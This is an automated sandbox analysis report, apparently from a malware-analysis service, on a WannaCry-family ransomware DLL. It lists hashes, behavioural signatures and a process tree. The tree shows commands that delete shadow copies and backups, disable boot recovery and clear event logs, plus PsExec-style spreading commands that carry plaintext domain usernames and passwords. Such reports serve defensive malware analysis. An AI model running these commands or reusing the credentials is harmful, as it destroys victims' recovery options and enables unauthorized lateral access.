-
max time kernel
164s -
max time network
198s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
26-12-2020 20:16
Static task
static1
Behavioral task
behavioral1
Sample
WannaCry/HEUR.Trojan-Downloader.Win32.Generic.02c5f1515bf42798728fac17bfe1e4c1.dll
Resource
win7v20201028
Behavioral task
behavioral2
Sample
WannaCry/HEUR.Trojan-Downloader.Win32.Generic.02c5f1515bf42798728fac17bfe1e4c1.dll
Resource
win10v20201028
Behavioral task
behavioral3
Sample
WannaCry/HEUR.Trojan.Win32.Generic.fc4bb3140f35cc8abd681b63096e7b81.dll
Resource
win7v20201028
Behavioral task
behavioral4
Sample
WannaCry/HEUR.Trojan.Win32.Generic.fc4bb3140f35cc8abd681b63096e7b81.dll
Resource
win10v20201028
Behavioral task
behavioral5
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.01bdc6fb077098f4a3b60f4b0e479a7f.dll
Resource
win7v20201028
Behavioral task
behavioral6
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.01bdc6fb077098f4a3b60f4b0e479a7f.dll
Resource
win10v20201028
Behavioral task
behavioral7
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.033f9150e241e7accecb60d849481871.dll
Resource
win7v20201028
Behavioral task
behavioral8
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.033f9150e241e7accecb60d849481871.dll
Resource
win10v20201028
Behavioral task
behavioral9
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.0ab2aeda90221832167e5127332dd702.dll
Resource
win7v20201028
Behavioral task
behavioral10
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.0ab2aeda90221832167e5127332dd702.dll
Resource
win10v20201028
Behavioral task
behavioral11
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.0ab9a60a55cb40fc338e8f4988feee2f.dll
Resource
win7v20201028
Behavioral task
behavioral12
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.0ab9a60a55cb40fc338e8f4988feee2f.dll
Resource
win10v20201028
Behavioral task
behavioral13
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.0d95f3f64e7782ec7acd3a1b76c276a6.dll
Resource
win7v20201028
Behavioral task
behavioral14
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.0d95f3f64e7782ec7acd3a1b76c276a6.dll
Resource
win10v20201028
Behavioral task
behavioral15
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.106e21fb736cb4e7a18a1746ef18e03f.dll
Resource
win7v20201028
Behavioral task
behavioral16
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.106e21fb736cb4e7a18a1746ef18e03f.dll
Resource
win10v20201028
Behavioral task
behavioral17
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.1147f2c00d4bfd70169fe034c5965066.dll
Resource
win7v20201028
Behavioral task
behavioral18
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.1147f2c00d4bfd70169fe034c5965066.dll
Resource
win10v20201028
Behavioral task
behavioral19
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.12cb506898dac8a271c8b940a9a3dfba.dll
Resource
win7v20201028
Behavioral task
behavioral20
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.12cb506898dac8a271c8b940a9a3dfba.dll
Resource
win10v20201028
Behavioral task
behavioral21
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.1d6958990c8c4f5b9b93efa692b84937.dll
Resource
win7v20201028
Behavioral task
behavioral22
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.1d6958990c8c4f5b9b93efa692b84937.dll
Resource
win10v20201028
Behavioral task
behavioral23
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.1e8e8eb9b0c25208b5c83be09430c010.dll
Resource
win7v20201028
Behavioral task
behavioral24
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.1e8e8eb9b0c25208b5c83be09430c010.dll
Resource
win10v20201028
Behavioral task
behavioral25
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.29a9dd686f08aacddacc43a0c57215f2.dll
Resource
win7v20201028
Behavioral task
behavioral26
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.29a9dd686f08aacddacc43a0c57215f2.dll
Resource
win10v20201028
Behavioral task
behavioral27
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.2a13081acf353142a3e792683520cfaf.dll
Resource
win7v20201028
Behavioral task
behavioral28
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.2a13081acf353142a3e792683520cfaf.dll
Resource
win10v20201028
Behavioral task
behavioral29
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.2e5a8ac5174219bcb08d7449e43b1440.dll
Resource
win7v20201028
Behavioral task
behavioral30
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.2e5a8ac5174219bcb08d7449e43b1440.dll
Resource
win10v20201028
Behavioral task
behavioral31
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.2f76b88b420003516f90062940ef7881.dll
Resource
win7v20201028
Behavioral task
behavioral32
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.2f76b88b420003516f90062940ef7881.dll
Resource
win10v20201028
General
-
Target
WannaCry/Trojan-Ransom.Win32.Wanna.m.106e21fb736cb4e7a18a1746ef18e03f.dll
-
Size
5.0MB
-
MD5
106e21fb736cb4e7a18a1746ef18e03f
-
SHA1
77a6da4aba3f6f0f8da2d5a5d646d295ca0fb088
-
SHA256
54d4b7ac7bafcf657cceb0ba8231d287065a1da82f9cc8dbf4077be950bf3d8e
-
SHA512
0056a56bb4a95743232034ea6db0fe692c43751c4854b1695cf82989be82c987e64fa48448cc07516409f3e50c0ae9c0b6ccefb37b504cc3f7a05334a5f6e7cb
Malware Config
Signatures
-
Wannacry
WannaCry is a ransomware cryptoworm.
-
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 1240 bcdedit.exe 3848 bcdedit.exe -
Processes:
wbadmin.exepid process 3600 wbadmin.exe -
Executes dropped EXE 33 IoCs
Processes:
mssecsvc.exemssecsvc.exetasksche.exeseqwq.exe_rgs.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exepid process 2356 mssecsvc.exe 3156 mssecsvc.exe 2772 tasksche.exe 3592 seqwq.exe 3836 _rgs.exe 2184 _hvd.exe 3612 _hvd.exe 2188 _hvd.exe 4036 _hvd.exe 2128 _hvd.exe 4108 _hvd.exe 4168 _hvd.exe 4216 _hvd.exe 4264 _hvd.exe 4320 _hvd.exe 4392 _hvd.exe 4448 _hvd.exe 4508 _hvd.exe 4556 _hvd.exe 4604 _hvd.exe 4656 _hvd.exe 4704 _hvd.exe 4752 _hvd.exe 4800 _hvd.exe 4852 _hvd.exe 4900 _hvd.exe 4948 _hvd.exe 4996 _hvd.exe 5048 _hvd.exe 5092 _hvd.exe 4100 _hvd.exe 4156 _hvd.exe 4204 _hvd.exe -
Drops file in System32 directory 7 IoCs
Processes:
mssecsvc.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat mssecsvc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 mssecsvc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE mssecsvc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies mssecsvc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 mssecsvc.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\P877MHW0.cookie mssecsvc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\P877MHW0.cookie mssecsvc.exe -
Drops file in Windows directory 2 IoCs
Processes:
rundll32.exemssecsvc.exedescription ioc process File created C:\WINDOWS\mssecsvc.exe rundll32.exe File created C:\WINDOWS\tasksche.exe mssecsvc.exe -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI registry information is often read in order to detect sandbox environments.
Processes:
vds.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 vds.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1184 vssadmin.exe -
Modifies data under HKEY_USERS 66 IoCs
Processes:
_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exemssecsvc.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exe_hvd.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" mssecsvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" mssecsvc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" 
_hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" mssecsvc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" mssecsvc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ mssecsvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Set value (int) 
\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix mssecsvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" mssecsvc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" mssecsvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software _hvd.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe Set value (int) 
\REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _hvd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _hvd.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
seqwq.exepid process 3592 seqwq.exe 3592 seqwq.exe 3592 seqwq.exe 3592 seqwq.exe 3592 seqwq.exe 3592 seqwq.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
Processes:
_ftf.exeseqwq.exe_rgs.exevssvc.exewbengine.exe_hvd.exewevtutil.exedescription pid process Token: SeAssignPrimaryTokenPrivilege 2308 _ftf.exe Token: SeIncreaseQuotaPrivilege 2308 _ftf.exe Token: SeSecurityPrivilege 2308 _ftf.exe Token: SeTakeOwnershipPrivilege 2308 _ftf.exe Token: SeLoadDriverPrivilege 2308 _ftf.exe Token: SeSystemtimePrivilege 2308 _ftf.exe Token: SeBackupPrivilege 2308 _ftf.exe Token: SeRestorePrivilege 2308 _ftf.exe Token: SeShutdownPrivilege 2308 _ftf.exe Token: SeSystemEnvironmentPrivilege 2308 _ftf.exe Token: SeUndockPrivilege 2308 _ftf.exe Token: SeManageVolumePrivilege 2308 _ftf.exe Token: SeDebugPrivilege 3592 seqwq.exe Token: SeShutdownPrivilege 3836 _rgs.exe Token: SeBackupPrivilege 1840 vssvc.exe Token: SeRestorePrivilege 1840 vssvc.exe Token: SeAuditPrivilege 1840 vssvc.exe Token: SeBackupPrivilege 2800 wbengine.exe Token: SeRestorePrivilege 2800 wbengine.exe Token: SeSecurityPrivilege 2800 wbengine.exe Token: SeSecurityPrivilege 3612 _hvd.exe Token: SeBackupPrivilege 3612 _hvd.exe Token: SeSecurityPrivilege 2188 wevtutil.exe Token: SeBackupPrivilege 2188 wevtutil.exe -
Suspicious use of WriteProcessMemory 120 IoCs
Processes:
rundll32.exerundll32.exePSEXESVC.exe_ftf.exe_rgs.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 3668 wrote to memory of 648 3668 rundll32.exe rundll32.exe PID 3668 wrote to memory of 648 3668 rundll32.exe rundll32.exe PID 3668 wrote to memory of 648 3668 rundll32.exe rundll32.exe PID 648 wrote to memory of 2356 648 rundll32.exe mssecsvc.exe PID 648 wrote to memory of 2356 648 rundll32.exe mssecsvc.exe PID 648 wrote to memory of 2356 648 rundll32.exe mssecsvc.exe PID 508 wrote to memory of 2308 508 PSEXESVC.exe _ftf.exe PID 508 wrote to memory of 2308 508 PSEXESVC.exe _ftf.exe PID 508 wrote to memory of 2308 508 PSEXESVC.exe _ftf.exe PID 2308 wrote to memory of 3592 2308 _ftf.exe seqwq.exe PID 2308 wrote to memory of 3592 2308 _ftf.exe seqwq.exe PID 2308 wrote to memory of 3836 2308 _ftf.exe _rgs.exe PID 2308 wrote to memory of 3836 2308 _ftf.exe _rgs.exe PID 2308 wrote to memory of 3836 2308 _ftf.exe _rgs.exe PID 3836 wrote to memory of 2676 3836 _rgs.exe cmd.exe PID 3836 wrote to memory of 2676 3836 _rgs.exe cmd.exe PID 2676 wrote to memory of 1184 2676 cmd.exe vssadmin.exe PID 2676 wrote to memory of 1184 2676 cmd.exe vssadmin.exe PID 3836 wrote to memory of 3168 3836 _rgs.exe cmd.exe PID 3836 wrote to memory of 3168 3836 _rgs.exe cmd.exe PID 3168 wrote to memory of 3600 3168 cmd.exe wbadmin.exe PID 3168 wrote to memory of 3600 3168 cmd.exe wbadmin.exe PID 3836 wrote to memory of 2576 3836 _rgs.exe cmd.exe PID 3836 wrote to memory of 2576 3836 _rgs.exe cmd.exe PID 2576 wrote to memory of 1240 2576 cmd.exe bcdedit.exe PID 2576 wrote to memory of 1240 2576 cmd.exe bcdedit.exe PID 2308 wrote to memory of 2184 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 2184 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 2184 2308 _ftf.exe _hvd.exe PID 2576 wrote to memory of 3848 2576 cmd.exe bcdedit.exe PID 2576 wrote to memory of 3848 2576 cmd.exe bcdedit.exe PID 3836 wrote to memory of 68 3836 _rgs.exe cmd.exe PID 3836 wrote to memory 
of 68 3836 _rgs.exe cmd.exe PID 68 wrote to memory of 3612 68 cmd.exe wevtutil.exe PID 68 wrote to memory of 3612 68 cmd.exe wevtutil.exe PID 3836 wrote to memory of 1204 3836 _rgs.exe cmd.exe PID 3836 wrote to memory of 1204 3836 _rgs.exe cmd.exe PID 2308 wrote to memory of 3612 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 3612 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 3612 2308 _ftf.exe _hvd.exe PID 1204 wrote to memory of 2188 1204 cmd.exe wevtutil.exe PID 1204 wrote to memory of 2188 1204 cmd.exe wevtutil.exe PID 2308 wrote to memory of 2188 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 2188 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 2188 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 4036 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 4036 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 4036 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 2128 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 2128 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 2128 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 4108 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 4108 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 4108 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 4168 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 4168 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 4168 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 4216 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 4216 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 4216 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 4264 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 4264 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 4264 2308 _ftf.exe _hvd.exe PID 2308 wrote to memory of 4320 2308 _ftf.exe _hvd.exe
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\WannaCry\Trojan-Ransom.Win32.Wanna.m.106e21fb736cb4e7a18a1746ef18e03f.dll,#11⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\WannaCry\Trojan-Ransom.Win32.Wanna.m.106e21fb736cb4e7a18a1746ef18e03f.dll,#12⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\WINDOWS\mssecsvc.exeC:\WINDOWS\mssecsvc.exe3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\WINDOWS\tasksche.exeC:\WINDOWS\tasksche.exe /i4⤵
- Executes dropped EXE
-
C:\WINDOWS\mssecsvc.exeC:\WINDOWS\mssecsvc.exe -m security1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\PSEXESVC.exeC:\Windows\PSEXESVC.exe1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\_ftf.exe"_ftf.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\TEMP\seqwq.exe123 \\.\pipe\95455C3A-74A0-4677-9708-B03F99818A373⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\_rgs.exe"C:\Windows\TEMP\_rgs.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet4⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\Windows\system32\vssadmin.exec:\Windows\system32\vssadmin.exe delete shadows /all /quiet5⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quiet4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet5⤵
- Deletes backup catalog
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no5⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wevtutil.exe cl System4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wevtutil.exe cl Security4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\_hvd.exeC:\Windows\TEMP\_hvd.exe \\255.255.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_jwp.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_hvd.exeC:\Windows\TEMP\_hvd.exe \\255.255.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_jwp.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\_hvd.exeC:\Windows\TEMP\_hvd.exe \\10.10.0.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_jwp.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_hvd.exeC:\Windows\TEMP\_hvd.exe \\224.0.0.252 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_jwp.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_hvd.exeC:\Windows\TEMP\_hvd.exe \\224.0.0.252 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_jwp.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_hvd.exeC:\Windows\TEMP\_hvd.exe \\255.255.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_jwp.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_hvd.exeC:\Windows\TEMP\_hvd.exe \\255.255.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_jwp.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_hvd.exeC:\Windows\TEMP\_hvd.exe \\10.10.0.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_jwp.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_hvd.exeC:\Windows\TEMP\_hvd.exe \\255.255.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_jwp.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_hvd.exeC:\Windows\TEMP\_hvd.exe \\255.255.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_jwp.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_hvd.exeC:\Windows\TEMP\_hvd.exe \\255.255.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_jwp.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_hvd.exeC:\Windows\TEMP\_hvd.exe \\255.255.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_jwp.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
